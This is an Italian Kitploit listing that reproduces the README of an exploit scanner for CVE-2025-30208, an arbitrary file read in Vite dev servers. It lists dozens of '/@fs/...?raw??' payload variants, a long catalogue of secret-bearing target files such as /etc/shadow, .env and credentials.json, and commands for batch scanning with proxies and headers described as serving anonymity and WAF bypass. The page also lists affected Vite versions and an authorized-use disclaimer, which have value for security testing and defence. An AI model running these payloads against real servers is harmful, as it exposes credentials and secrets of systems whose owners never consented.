Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di media gravità nel server di sviluppo Vite (un popolare strumento di build frontend). | Kitploit
Strumenti/GitHubGitHub/themehackers/cve-2025-30208
Scanner di VulnerabilitàGenerazione di PayloadExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di media gravità nel server di sviluppo Vite (un popolare strumento di build frontend).

Vedi Repository
101 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 Scanner di Vulnerabilità di Lettura Arbitraria di File Vite CVE-2025-30208

Python License Security Status Modular

Scanner di vulnerabilità avanzato per CVE-2025-30208 con funzionalità di livello enterprise

Strumento professionale di penetration testing per il rilevamento della vulnerabilità di lettura arbitraria di file in Vite

🚀 Avvio Rapido • 📋 Caratteristiche • 🔧 Utilizzo • 📊 Esempi • 🛡️ Sicurezza


📖 Panoramica

Questo è uno scanner di vulnerabilità completo progettato per rilevare e sfruttare la vulnerabilità CVE-2025-30208 nei server di sviluppo Vite. La vulnerabilità consente l'accesso alla lettura arbitraria di file attraverso gli endpoint del file system di Vite, esponendo potenzialmente file di configurazione sensibili, codice sorgente e informazioni di sistema.

🎯 Cosa Fa Questo Strumento

  • Rileva istanze Vite vulnerabili attraverso la rete
  • Sfrutta la vulnerabilità di lettura arbitraria di file in modo sicuro
  • Scopre file sensibili e dati di configurazione
  • Riporta i risultati in più formati (HTML, JSON, Console)
  • Gestisce sessioni di scansione e configurazioni
  • Gestisce gli errori in modo elegante con meccanismi di ripetizione automatica

🏗️ Architettura Modulare

Lo strumento ora presenta un'architettura modulare per una migliore manutenibilità ed estensibilità:

  • CVE-2025-30208.py - Applicazione scanner principale
  • payloads.py - Payload di sfruttamento avanzati (60+ varianti)
  • sensitive_files.py - Database completo di file sensibili (200+ file)
  • html_template.py - Template di reporting HTML in stile hacker migliorato

🚀 Avvio Rapido

Prerequisiti

root@kitploit:~
pip3 install -r requirements.txt

Utilizzo Base

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Caratteristiche

🔍 Rilevamento Core della Vulnerabilità

  • 60+ Payload Avanzati: Tecniche di sfruttamento complete per il massimo rilevamento
  • Rilevamento Intelligente: Analisi delle risposte intelligente per evitare falsi positivi
  • Validazione in Tempo Reale: Validazione continua delle risposte del target
  • Test Completo: Testa tutti gli endpoint vulnerabili noti

🛡️ Funzionalità di Sicurezza Migliorate

  • Supporto Proxy: Configurazione proxy HTTP/HTTPS per anonimato
  • Header Personalizzati: Bypass WAF/IPS con header HTTP personalizzati
  • Limitazione della Frequenza: Ritardi configurabili per evitare rilevamento
  • Gestione delle Sessioni: Salva e ripristina sessioni di scansione
  • Validazione degli Input: Validazione completa dei parametri

🔧 Capacità Avanzate

  • Scansione in Lotto: Scansione multi-thread di più target
  • Scoperta di File Sensibili: Scoperta automatica di 200+ file sensibili
  • Test di Connettività: Test dei protocolli TCP/UDP/HTTP/HTTPS
  • Recupero dagli Errori: Ripetizione automatica con backoff esponenziale
  • Registrazione Completa: Log dettagliati con timestamp

📊 Reportistica e Output

  • 🎨 Report HTML Migliorati: Bellissimi report di vulnerabilità in stile hacker con animazioni
  • Esportazione JSON: Dati strutturati per ulteriori analisi
  • Output su Console: Feedback codificato a colori in tempo reale
  • File di Log: Audit trail dettagliati
  • Interfaccia Web Interattiva: Server web integrato per visualizzare i report

🔧 Guida all'Utilizzo

1. Configurazione Base

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test della Vulnerabilità

root@kitploit:~
CVE-2025-30208 > run

# Abilita la modalità verbose per output dettagliato
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scansione in Lotto

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Premere Invio due volte per terminare]

4. Scoperta di File Sensibili

root@kitploit:~
CVE-2025-30208 > scan

5. Configurazione Avanzata

root@kitploit:~
# Configura proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Imposta header personalizzati
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configura limitazione della frequenza
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Reportistica HTML Migliorata

root@kitploit:~
# Genera un bellissimo report HTML
CVE-2025-30208 > pull

# Avvia il server web per visualizzare il report
CVE-2025-30208 > web

# Avvia il server web su una porta specifica
CVE-2025-30208 > web 8081

# Arresta il server web
CVE-2025-30208 > web off

📊 Riferimento Comandi


⚙️ Opzioni di Configurazione


🎨 Sistema di Payload Migliorato

Lo scanner ora utilizza 60+ diverse varianti di payload organizzate in payloads.py:

Payload Primari @fs

root@kitploit:~
/@fs/{percorso_file}?raw??
/@fs/{percorso_file}?raw&url
/@fs/{percorso_file}?import&raw??
/@fs/{percorso_file}?raw&import
/@fs/{percorso_file}?import&url

Variazioni Estese dei Parametri

root@kitploit:~
/@fs/{percorso_file}?raw&source
/@fs/{percorso_file}?raw&content
/@fs/{percorso_file}?raw&data
/@fs/{percorso_file}?raw&file
/@fs/{percorso_file}?raw&type=text
/@fs/{percorso_file}?raw&format=text
/@fs/{percorso_file}?raw&encoding=utf8

Variazioni Specifiche di Vite

root@kitploit:~
/@fs/{percorso_file}?raw&vite&dev
/@fs/{percorso_file}?raw&vite&hot
/@fs/{percorso_file}?raw&vite&hmr
/@fs/{percorso_file}?raw&development
/@fs/{percorso_file}?raw&debug

Variazioni del Sistema di Moduli

root@kitploit:~
/@fs/{percorso_file}?raw&esm
/@fs/{percorso_file}?raw&cjs
/@fs/{percorso_file}?raw&umd
/@fs/{percorso_file}?raw&js
/@fs/{percorso_file}?raw&ts
/@fs/{percorso_file}?raw&json
/@fs/{percorso_file}?raw&css
/@fs/{percorso_file}?raw&html

Endpoint Alternativi

root@kitploit:~
/app/{percorso_file}?raw??
/App/{percorso_file}?raw??

🔍 Scoperta Migliorata di File Sensibili

Lo strumento ora testa 200+ file sensibili organizzati in sensitive_files.py:

🖥️ File di Sistema (Linux/Unix)

  • /etc/passwd - Informazioni account utente
  • /etc/shadow - Dati password crittografati
  • /etc/services - Servizi di rete
  • /etc/hosts - Mappature hostname
  • /etc/fstab - Tabella del file system
  • /etc/ssh/sshd_config - Configurazione server SSH
  • /etc/crontab - Processi cron di sistema
  • /etc/sudoers - Configurazione sudo

📊 Informazioni di Processo

  • /proc/version - Versione kernel
  • /proc/cpuinfo - Informazioni CPU
  • /proc/meminfo - Informazioni memoria
  • /proc/self/environ - Ambiente processo
  • /proc/self/cmdline - Linea di comando processo
  • /proc/net/tcp - Connessioni TCP
  • /proc/net/udp - Connessioni UDP

⚙️ Configurazione Applicazione

  • .env - Variabili d'ambiente
  • .env.local - Ambiente locale
  • .env.production - Ambiente di produzione
  • config.json - Configurazione applicazione
  • settings.json - Impostazioni applicazione
  • application.properties - Configurazione Spring
  • application.yml - Configurazione YAML
  • database.yml - Configurazione database
  • secrets.json - Gestione segreti

📦 File Node.js / JavaScript

  • package.json - Dipendenze Node.js
  • package-lock.json - Dipendenze bloccate
  • yarn.lock - File di blocco Yarn
  • vite.config.js - Configurazione Vite
  • vite.config.ts - Configurazione Vite TypeScript
  • tsconfig.json - Configurazione TypeScript
  • webpack.config.js - Configurazione Webpack
  • next.config.js - Configurazione Next.js
  • nuxt.config.js - Configurazione Nuxt.js
  • angular.json - Configurazione Angular
  • vue.config.js - Configurazione Vue.js
  • rollup.config.js - Configurazione Rollup
  • eslint.config.js - Configurazione ESLint

🔧 File Git

  • .git/config - Configurazione Git
  • .gitignore - Regole di ignoramento Git
  • .gitattributes - Attributi Git
  • .gitmodules - Sottomoduli Git
  • .git/HEAD - Branch corrente
  • .git/logs/HEAD - Log Git
  • .git/refs/heads/master - Branch master
  • .git/refs/heads/main - Branch main

📚 File di Documentazione

  • README.md - Documentazione del progetto
  • CHANGELOG.md - Registro modifiche
  • LICENSE - Informazioni licenza
  • CONTRIBUTING.md - Linee guida per contribuire
  • AUTHORS - Informazioni autori
  • TODO.md - Elenco cose da fare
  • ROADMAP.md - Roadmap di sviluppo

🐳 File Docker

  • Dockerfile - Configurazione Docker
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - Configurazione override
  • .dockerignore - Regole di ignoramento Docker
  • docker-compose.prod.yml - Configurazione di produzione
  • docker-compose.dev.yml - Configurazione di sviluppo

🌐 Configurazione Server Web

  • nginx.conf - Configurazione Nginx
  • apache2.conf - Configurazione Apache
  • httpd.conf - Configurazione demone HTTP
  • .htaccess - Controllo accesso Apache
  • web.config - Configurazione IIS
  • robots.txt - Direttive motori di ricerca
  • sitemap.xml - Struttura del sito
  • manifest.json - Manifest dell'app web
  • sw.js - Service worker
  • firebase.json - Configurazione Firebase
  • firebase.rules - Regole di sicurezza Firebase

🪟 File Windows

  • boot.ini - Configurazione di avvio
  • autoexec.bat - Script di esecuzione automatica
  • system.ini - Configurazione di sistema
  • win.ini - Configurazione Windows
  • Users - Directory utenti
  • Windows - File di sistema
  • Program Files - Directory applicazioni

🍎 File macOS

  • System - File di sistema
  • Library - File libreria
  • Applications - File applicazioni
  • private/etc/hosts - File hosts
  • private/etc/passwd - Account utente

🗄️ File Database

  • database.db - Database SQLite
  • database.sqlite - Database SQLite
  • data.db - Database dati
  • dump.sql - Dump database
  • schema.sql - Schema database
  • migrations - Migrazioni database

📝 File di Log

  • logs - Directory dei log
  • error.log - Log errori
  • access.log - Log accessi
  • app.log - Log applicativi
  • debug.log - Log di debug
  • combined.log - Log combinati

💾 File di Backup

  • backup - Directory di backup
  • backup.sql - Backup database
  • backup.zip - Backup compresso
  • dump - Dump dati
  • export - Esportazione dati

🔒 Sicurezza e Autenticazione

  • auth.json - Configurazione autenticazione
  • credentials.json - Archiviazione credenziali
  • keys.json - Gestione chiavi
  • tokens.json - Archiviazione token
  • jwt.json - Configurazione JWT
  • oauth.json - Configurazione OAuth

🔌 File API e Servizi

  • api.json - Configurazione API
  • swagger.json - Documentazione API
  • openapi.json - Specifica OpenAPI
  • graphql.json - Configurazione GraphQL
  • schema.json - Schema API

☁️ Cloud e Deploy

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Configurazione Serverless
  • terraform.tf - Configurazione Terraform
  • kubernetes.yml - Configurazione Kubernetes
  • k8s.yml - Configurazione Kubernetes

📊 Monitoraggio e Analisi

  • analytics.json - Configurazione analisi
  • monitoring.json - Impostazione monitoraggio
  • metrics.json - Configurazione metriche
  • telemetry.json - Dati telemetria

🎨 Reportistica HTML Migliorata

Lo strumento ora genera bellissimi report HTML in stile hacker con:

✨ Caratteristiche Visive

  • Sfondo in stile Matrix con caratteri animati che cadono
  • Animazioni di gradiente ed effetti luminosi
  • Elementi interattivi con effetti hover
  • Design reattivo per tutti i dispositivi
  • Tema scuro ottimizzato per professionisti della sicurezza

📊 Statistiche Interattive

  • Contatori in tempo reale per perdite totali e byte esposti
  • Indicatori di gravità con codifica a colori
  • Funzionalità di copia per ogni perdita
  • Anteprima del contenuto con dimensione e conteggio righe
  • Sezioni espandibili per analisi dettagliata

🔧 Caratteristiche Tecniche

  • Integrazione Google Fonts (JetBrains Mono, Orbitron)
  • Animazioni CSS e transizioni
  • Interattività JavaScript per UX migliorata
  • Design mobile-responsive
  • Compatibilità cross-browser

🌐 Integrazione Server Web

  • Server HTTP integrato per visualizzare i report
  • Apertura automatica del browser
  • Opzioni di configurazione porta
  • Comandi facili avvio/arresto

🛡️ Gestione degli Errori e Recupero

Meccanismo di Ripetizione Automatica

  • 3 Tentativi di Ripetizione: Le richieste fallite vengono automaticamente ripetute
  • Backoff Esponenziale: Ritardi crescenti tra i tentativi
  • Classificazione Intelligente degli Errori: Gestione diversa per diversi tipi di errore
  • Recupero Graduale: Lo strumento continua a funzionare dopo gli errori

Categorie di Errore

  • NetworkError: Problemi di connessione, timeout, proxy
  • ConfigurationError: Impostazioni e parametri non validi
  • ValidationError: Parametri di input non validi
  • ScannerError: Errori generali dello scanner

Funzionalità di Validazione

  • Validazione Input in Tempo Reale: Tutti i parametri vengono validati prima dell'uso
  • Validazione della Configurazione: Validazione completa prima della scansione
  • Test di Connettività: Test dei protocolli TCP/UDP/HTTP/HTTPS
  • Validazione Proxy: Validazione del formato URL proxy

📁 File di Output


📝 Versioni Interessate

🚨 Versioni Vulnerabili

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Versioni Non Vulnerabili

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Sicurezza e Utilizzo Etico

⚠️ Note Importanti sulla Sicurezza

  • Test Autorizzati Solo: Utilizzare solo su sistemi di cui si è proprietari o per cui si ha esplicita autorizzazione
  • Divulgazione Responsabile: Segnalare le vulnerabilità ai proprietari del sistema
  • Limitazione della Frequenza: Utilizzare ritardi appropriati per evitare di sovraccaricare i target
  • Utilizzo Proxy: Considerare l'uso di proxy per anonimato quando appropriato
  • Conformità Legale: Assicurarsi di rispettare le leggi e le normative locali

🔒 Buone Pratiche

  • Ottenere sempre il permesso scritto prima di testare
  • Utilizzare solo in ambienti controllati
  • Documentare tutte le attività di test
  • Rispettare i limiti di frequenza e le risorse di sistema
  • Segnalare i risultati in modo responsabile

🚀 Esempi di Utilizzo Avanzato

Esempio 1: Scansione di Rete Completa

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Esempio 2: Scansione Furtiva con Proxy

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Esempio 3: Workflow di Reportistica Migliorato

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Esempio 4: Scoperta di File Sensibili

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Struttura del Progetto

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Applicazione scanner principale
├── payloads.py                # Payload di sfruttamento avanzati (60+)
├── sensitive_files.py         # Database di file sensibili (200+)
├── html_template.py           # Template di reporting HTML migliorato
├── README.md                  # Questa documentazione
├── requirements.txt           # Dipendenze Python
├── logs/                      # Directory file di log
├── data_leak.html            # Report HTML generati
├── data_leak.json            # Report JSON generati
└── session.json              # Configurazioni sessione salvate

🤝 Contributi

Accogliamo con favore i contributi per migliorare questo strumento:

  1. Forka il repository
  2. Crea un branch per la funzionalità
  3. Apporta le tue modifiche
  4. Testa accuratamente
  5. Invia una pull request

Aree di Contributo

  • Nuove variazioni di payload in payloads.py
  • Pattern aggiuntivi di file sensibili in sensitive_files.py
  • Template HTML migliorati in html_template.py
  • Gestione degli errori migliorata
  • Ottimizzazioni delle prestazioni
  • Miglioramenti alla documentazione

📄 Licenza

Questo progetto è concesso in licenza per scopi educativi e di test di sicurezza autorizzati esclusivamente.

⚠️ Disclaimer Legale: Questo strumento è destinato esclusivamente a scopi di test di sicurezza autorizzati e ricerca. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di testare qualsiasi sistema. Gli autori non sono responsabili per qualsiasi uso improprio di questo strumento.


👨‍💻 Autore

ThemeHackers

GitHub

Ricercatore di Sicurezza & Penetration Tester


⭐ Se questo strumento ti è stato utile, per favore lascia una stella! ⭐

Realizzato con ❤️ per la comunità della sicurezza

Scarica lo strumento
ComandoDescrizioneEsempio
set <opzione> <valore>Imposta opzioni di configurazioneset RHOST 192.168.1.100
show optionsMostra le impostazioni correntishow options
editEditor interattivo delle opzioniedit
run / exploitEsegui test di vulnerabilitàrun
batchScansione batch di più targetbatch
scanScopri file sensibiliscan
pullEsporta risultati in HTML/JSONpull
web [on|off|porta]Server web per report HTMLweb 8080
saveSalva configurazione sessionesave
loadCarica configurazione sessioneload
testTesta la connettività al targettest
validateValida la configurazione correntevalidate
verboseAttiva/disattiva modalità verboseverbose
proxyConfigura impostazioni proxyproxy
headersImposta header HTTP personalizzatiheaders
rateConfigura limitazione della frequenzarate
logMostra informazioni di loglog
help / ?Mostra aiutohelp
exit / quitEsci dallo strumentoexit
OpzioneDescrizioneValore PredefinitoValidazione
RHOSTIndirizzo host/IP target-Validazione hostname/IP
RPORTNumero porta target-Intervallo porte (1-65535)
FILEPATHPercorso file da testareetc/passwdValidazione percorso
PROXYURL proxy HTTP/HTTPS-Validazione formato URL
VERBOSEAbilita output verbosefalseValidazione booleana
RATE_LIMITRitardo tra richieste (secondi)0.3Validazione numerica
THREADSNumero di thread per scansione batch5Validazione intera
TIMEOUTTimeout richiesta (secondi)5Validazione intera
CUSTOM_HEADERSHeader HTTP personalizzati (JSON){}Validazione formato JSON
  • prettier.config.js - Configurazione Prettier
  • jest.config.js - Configurazione Jest
  • babel.config.js - Configurazione Babel
  • tailwind.config.js - Configurazione Tailwind CSS
  • FileDescrizioneFormato
    data_leak.htmlReport di vulnerabilità HTML in stile hacker miglioratoHTML
    data_leak.jsonEsportazione JSON strutturataJSON
    sensitive_files_discovery.jsonFile sensibili scopertiJSON
    session.jsonConfigurazione sessione salvataJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logLog di audit dettagliatiTesto